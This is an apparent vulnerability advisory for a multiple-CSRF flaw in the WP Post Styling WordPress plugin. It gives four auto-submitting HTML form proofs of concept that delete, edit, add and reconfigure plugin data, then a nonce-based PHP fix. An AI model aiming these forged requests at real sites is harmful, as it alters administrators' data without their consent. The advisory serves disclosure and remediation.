WordPress Plugin Vulnerabilities
WP Post Styling < 1.3.1 - Multiple CSRF
Description
The plugin does not have CSRF checks in various actions, which could allow attackers to make a logged-in admin delete the plugin's data, update the settings, add new entries and more via CSRF attacks.
Proof of Concept
<!-- PoC 1: delete a style library entry -->
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling/wp-post-styling.php" method="POST">
    <input type="text" name="delete_style" value="1">
    <input type="text" name="submit-type" value="library">
    <input type="text" name="submit" value="Yes, delete it!">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>

<!-- PoC 2: update the plugin settings -->
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling%2Fwp-post-styling.php" method="POST">
    <input type="text" name="jd-post-styling-screen" value="1">
    <input type="text" name="jd-post-styling-default" value="disable">
    <input type="text" name="jd-post-styling-library" value="disable">
    <input type="text" name="jd-post-styling-boxsize" value="6">
    <input type="text" name="submit-type" value="options">
    <input type="text" name="submit" value="Save WP Post Styling Options">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>

<!-- PoC 3: edit an existing style library entry -->
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling%2Fwp-post-styling.php&edit_style=1" method="POST">
    <input type="text" name="edit_style" value="1">
    <input type="text" name="jd_style_library_name" value="test">
    <input type="text" name="jd_style_library_css" value="body {color: blue}">
    <input type="text" name="jd_style_library_type" value="screen">
    <input type="text" name="submit-type" value="library">
    <input type="text" name="submit" value="Update WP Post Styling Library">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>

<!-- PoC 4: add a new style library entry -->
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wp-post-styling%2Fwp-post-styling.php" method="POST">
    <input type="text" name="jd_style_library_name" value="test2">
    <input type="text" name="jd_style_library_css" value="body {color: blue}">
    <input type="text" name="jd_style_library_type" value="screen">
    <input type="text" name="submit-type" value="library">
    <input type="text" name="submit" value="Add to WP Post Styling Library">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.getElementById("test")
    );
</script>
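A hardened form and handler for the actions exercised above, as an added example rather than the plugin's own code or fix: a WordPress nonce is emitted in the form and verified, together with the user's capability, before any state change, so a cross-site form that lacks the token is rejected. The example_wpps_* names, the nonce action and field strings, and the use of the admin_init hook are assumptions; the form field names come from the proof of concept.

```php
<?php
// Added example, not the plugin's code. The example_wpps_* names and the
// nonce action/field strings are hypothetical.
const EXAMPLE_WPPS_NONCE_ACTION = 'example-wpps-admin-action';
const EXAMPLE_WPPS_NONCE_FIELD  = '_example_wpps_nonce';

// Form side: every admin form that posts "submit-type" carries a nonce.
function example_wpps_render_delete_form( $style_id ) {
    ?>
    <form method="post">
        <?php wp_nonce_field( EXAMPLE_WPPS_NONCE_ACTION, EXAMPLE_WPPS_NONCE_FIELD ); ?>
        <input type="hidden" name="delete_style" value="<?php echo esc_attr( $style_id ); ?>">
        <input type="hidden" name="submit-type" value="library">
        <input type="submit" name="submit" value="Yes, delete it!">
    </form>
    <?php
}

// Handler side: returns the validated submit-type, or null when the request
// is not a plugin form post. Stops the request if a check fails.
function example_wpps_guard_request() {
    if ( ! isset( $_POST['submit-type'] ) ) {
        return null;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You are not allowed to change these settings.', '', array( 'response' => 403 ) );
    }
    // Dies (HTTP 403) when the nonce is absent, expired, or was issued
    // for a different user or action.
    check_admin_referer( EXAMPLE_WPPS_NONCE_ACTION, EXAMPLE_WPPS_NONCE_FIELD );

    $type = sanitize_key( wp_unslash( $_POST['submit-type'] ) );
    return in_array( $type, array( 'library', 'options' ), true ) ? $type : null;
}

// Assumed hook point: run the guard before any settings or library change.
add_action( 'admin_init', function () {
    $type = example_wpps_guard_request();
    if ( null === $type ) {
        return;
    }
    // Only past this point may the plugin's own delete/add/edit/save code run.
} );
```

The same nonce field has to be added to each of the four forms shown in the proof of concept, since the guard rejects any "submit-type" post without it.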
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-31
Added
2022-05-31
Last Updated
2023-02-27